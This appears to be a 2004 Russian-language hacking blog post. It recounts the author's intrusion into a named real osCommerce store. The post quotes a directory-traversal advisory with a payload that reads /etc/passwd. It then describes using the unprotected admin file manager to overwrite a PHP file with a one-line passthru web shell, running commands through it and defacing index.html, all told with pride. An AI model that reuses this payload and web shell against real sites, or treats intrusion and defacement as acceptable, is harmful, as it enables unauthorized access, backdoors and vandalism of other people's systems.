Продолжаем рассказ о пополнении нашего раздела (hacked)
на lwb57.webmen.ru.

20.05.2004 утро. Стандартный просмотр багтрага. Свежие
уязвимости и другие забавные новости из мира интернет безопасности. Одна из
них:

"Удаленный просмотр произвольных файлвов в
osCommerce"

Уязвимость обхода каталога обнаружена в osCommerce. Удаленный
авторизованный администратор может просматривать файлы на целевой системе.
'admin/file_manager.php' не проверяет данные, представленные пользователем в
параметре 'filename'.
Пример:

file_manager.php?action=download&file name=../../../../../../../../etc/passwd

Что ж, еще одна дырка, особо ничем не примечательная, статусом не
вышла (какой же я удаленный авторизованный администратор?) и даже если я им был бы,
на кой мне /etc/passwd.

Но тут на форуме проскакивает фраза от
logos'a о том, что дыра опаснее чем кажется на первый взгляд. Через privat связываюсь с ним, он дает мне линк:

http://www.moonstarlodge.com/catalog/ admin/file_manager.php

Захожу и вижу все файлы и папки директории /catalog/, вхожу в панель
администрирования osCommerce, даже не будучи администратором
;-). Посмотрел я на все это, кредиток не оказалось, и думал уже уйти, но что-то
дернуло посмотреть код php'шек в catalog'овской директории. И тогда я понял, что
имел ввиду logos, когда писал что опасность совсем не низкая. Удаленный
пользователь может редактировать содержимое php-файлов! Понятное дело содержимым
файла tell_a_friend.php стало стандартное <?php passthru("$cmd"); ?>.
Ну а дальше:

http://www.moonstarlodge.com/catalog/ tell_a_friend.php?cmd=ls и так далее. В конце, скромно дописав себя в index.html, 
удалился.

З.Ы. Огромное спасибо logos'у.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии